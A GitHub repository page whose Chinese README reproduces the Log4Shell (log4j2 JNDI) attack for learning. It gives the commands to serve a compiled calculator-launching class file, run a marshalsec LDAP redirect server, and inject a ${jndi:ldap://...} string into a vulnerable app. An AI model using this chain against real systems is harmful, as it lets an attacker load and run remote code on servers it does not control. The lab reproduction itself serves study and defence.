- 搭建一应用服务,使用存在漏洞的log4j版本记录用户输入
- 准备恶意脚本,并为其提供一个http
- 此处以打开MacOS和Widnows上的计算器应用为例,编写脚本,并对其编译得到class文件
- 为class文件提供http服务
python3 -m http.server 8000
- 提供一个LDAP服务,重定向到恶意脚本所在http服务
- LDAP服务(https://github.com/mbechler/marshalsec)
- 启动
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer exploit.codebase "http://192.168.3.226:8000/#OpenCalculatorW"
- 对应用服务输入脚本,触发漏洞
- 对应用服务器输入
${jndi:ldap://192.168.3.226:1389/OpenCalculatorW}
进行攻击
- 对应用服务器输入
- 攻击过程流程图
-
Notifications
You must be signed in to change notification settings - Fork 1
log4j2 JNDI 攻击复现学习
License
CLgithub/Log4j2AttackLearn
Folders and files
Name | Name | Last commit message | Last commit date | |
---|---|---|---|---|
Repository files navigation
About
log4j2 JNDI 攻击复现学习
Resources
License
Stars
Watchers
Forks
Releases
No releases published
Packages 0
No packages published